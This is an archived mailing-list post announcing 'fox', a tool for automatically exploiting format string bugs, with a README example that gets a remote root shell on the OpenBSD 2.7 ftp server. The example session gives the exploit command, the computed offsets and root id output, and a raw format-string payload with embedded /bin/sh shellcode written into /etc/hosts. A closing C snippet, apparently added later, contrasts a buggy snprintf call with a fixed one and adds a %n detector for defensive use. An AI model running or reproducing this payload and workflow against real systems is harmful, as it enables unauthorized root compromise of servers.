Hi

"fox", a tool I wrote for automatically exploiting any (or most) format bugs, locally and remotely. Runs on OpenBSD and not ported to other platforms, though it should be very straightforward. The only requirement is that you get the actual printed string back to the program; in the case of the OpenBSD 2.7 ftpd you need to proxy this through a small shell program since the output occurs in the process listing. Should work for exploiting bugs on most little-endian 32-bit machines like the i386, providing you supply the shellcode. Includes a trivial local example, and an example of how to point it at the OpenBSD 2.7 ftpd and remotely get a root prompt instead of the ftp banner.

Regards,
Fredrik Widlund

-x-

README for example 2: Exploiting OpenBSD 2.7 ftp server

Input has to be < 256 characters, working offsets are -18 and -2

Ex:

root@wolf> ./fox -s 220 -p 50 -o-18 ex2/ex2
alignment 0
chars before argument 111
chars before insert 0
argument offset 9
argument pointer offset 0
argument address 0xdfbfd15c
esp 0xdfbfd138
uid=0(root) gid=0(wheel) groups=0(wheel)
root@wolf> nc 127.0.0.1 21
id
uid=0(root) gid=0(wheel) groups=0(wheel)
uname -a
OpenBSD wolf 2.7 GENERIC#0 i386
cat /etc/hosts
127.0.0.1 AAAA<81>ð<81>Ð<81>¿<81>ßBBBB<81>ñ<81>Ð<81>¿<81>ßCCCC<81>ò<81>Ð<81>¿ <81>ßDDDD<81>ó<81>Ð<81>¿<81>ß%p%p%p%p%p%p%p%p%p%0323x%hn%0287x%hn%0238x%hn%0288x%hn<81>ëI<8B>$<81>Ã1<81>ÉQ<83><81>ÀP<89><81>Ã<83><81>ÃS<89>?<88>K<83><89>X<88>K <83><81>Ã<89><88>K<83><89>HP<81>¸;UUU%;<81>ª<81>ª<81>ª<81>Í<80>PP<81>¸UUU%<81>ª <81>ª<81>ª<81>Í<80><81>è<81>²<81>ÿ<81>ÿ<81>ÿ<81>ë<81>´[CODE_BY_LONEWOLF]/bin/shF-cGG/bin/shAxxxxxxxxxxxxx
exit
root@wolf>
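Added illustration, not from the post above and not part of fox: the C pattern that a format bug like the one in the ftpd example comes from, shown as the buggy call next to the fixed one, plus a small check that flags %n-style conversions in untrusted strings (the kind of chain visible in the /etc/hosts line). Function and buffer names are assumptions; the hostile input is constructed.

```c
/* Added example, not fox's code: "title" stands in for any buffer a daemon
 * builds from a user-controlled string (hostname, command). Names are
 * hypothetical; the input below is constructed to resemble the session. */
#include <stdio.h>
#include <string.h>

#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"
/* BUGGY: the untrusted string *is* the format, so %p reads the stack and %hn writes. */
void set_title_buggy(char *title, size_t n, const char *user)
{
    snprintf(title, n, user);
}
#pragma GCC diagnostic pop

/* FIXED: constant format; the untrusted string is only ever an argument. */
void set_title_fixed(char *title, size_t n, const char *user)
{
    snprintf(title, n, "%s", user);
}

/* Detection aid: returns 1 if s contains a %n conversion (any flags, width,
 * precision, positional index or length modifier in between). Not a fix. */
int has_write_conversion(const char *s)
{
    const char *p = s;
    while (*p) {
        if (*p++ != '%') continue;
        if (*p == '%') { p++; continue; }          /* literal "%%" */
        while (*p && strchr("-+ #0*$.0123456789", *p)) p++;
        while (*p && strchr("hlLqjzt", *p)) p++;
        if (*p == 'n') return 1;
        if (*p) p++;                               /* skip the conversion */
    }
    return 0;
}

int main(void)
{
    /* Constructed input shaped like the %hn chain in the session above. */
    const char *hostile = "%p%p%p%p%0323x%hn%0287x%hn";
    char title[256];
    set_title_fixed(title, sizeof title, hostile);
    printf("write conversion present: %d\n", has_write_conversion(hostile));
    printf("fixed version stored: %s\n", title);
    return 0;
}
```

The check is meant for log triage or an input filter in front of a daemon you cannot patch yet; the real fix is the constant format string in set_title_fixed.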
This archive was generated by hypermail 2b30 : Fri Apr 19 2002 - 11:49:48 PDT